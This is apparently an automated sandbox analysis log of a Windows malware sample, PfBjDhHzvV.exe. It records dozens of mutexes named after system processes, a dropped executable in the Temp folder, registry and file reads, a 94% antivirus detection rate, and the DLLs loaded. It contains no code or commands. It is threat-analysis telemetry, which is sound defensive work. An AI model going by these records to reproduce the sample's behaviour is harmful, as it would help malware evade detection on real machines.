            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\textinputhost.exeM_6852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6768_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1636_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\registryM_92_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5480_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4692_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6336_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4244_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2096_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4256_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_860_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_3536_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\sihost.exeM_3476_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3696_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2736_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3456_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6092_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3012_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\ctfmon.exeM_3852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4908_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1312_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1388_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1760_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5620_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1376_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2316_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_7072_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5740_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_7084_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5764_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4444_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4524_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\pfbjdhhzvv.exeM_7272_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_4224_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4548_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1952_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_7028_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1976_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4132_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6444_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6880_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4540_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5908_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4932_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2620_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3828_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5424_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4928_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3556_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1204_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_932_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2416_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\winstore.app.exeM_1868_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_524_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1804_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1436_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\explorer.exeM_4056_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6904_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_648_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_8080_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_556_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6984_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2344_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4432_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6552_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\dashost.exeM_4492_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1188_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1520_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_7384_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\memory compressionM_1608_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1992_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2524_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2536_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3032_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1736_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3092_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2460_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4288_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2404_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6644_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2432_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_772_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1096_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3300_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1020_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3364_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1044_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2636_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2612_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4480_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5648_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1400_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_704_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1476_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1872_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\sppsvc.exeM_7076_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\spoolsv.exeM_2216_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\smartscreen.exeM_5672_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\backgroundtaskhost.exeM_6176_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1668_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6748_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_624_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_6068_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4212_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5744_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2716_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5544_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_976_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5148_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5756_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5124_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1344_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1752_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_864_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5784_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_3596_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\sgrmbroker.exeM_2008_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: C:\Users\user~1\AppData\Local\Temp\xjjalq.exeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile read: C:\Windows\system.iniJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PfBjDhHzvV.exeReversingLabs: Detection: 94%
            Source: PfBjDhHzvV.exeString found in binary or memory: F-STOPW.
            Source: faawXJQQDELvfTymNiVz.exeString found in binary or memory: F-STOPW.
            Source: unknownProcess created: C:\Users\user\Desktop\PfBjDhHzvV.exe "C:\Users\user\Desktop\PfBjDhHzvV.exe"
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: drprov.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: ntlanman.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: davclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: davhlpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wpnclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: contentdeliverymanager.utilities.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinui.pcshell.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wincorlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wincorlib.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.xaml.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositorycore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windowmanagementapi.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: quickactionsdatamodel.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dxcore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: mrmcorer.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: languageoverlayutil.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: bcp47mrm.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: execmodelproxy.dllJump to behavior
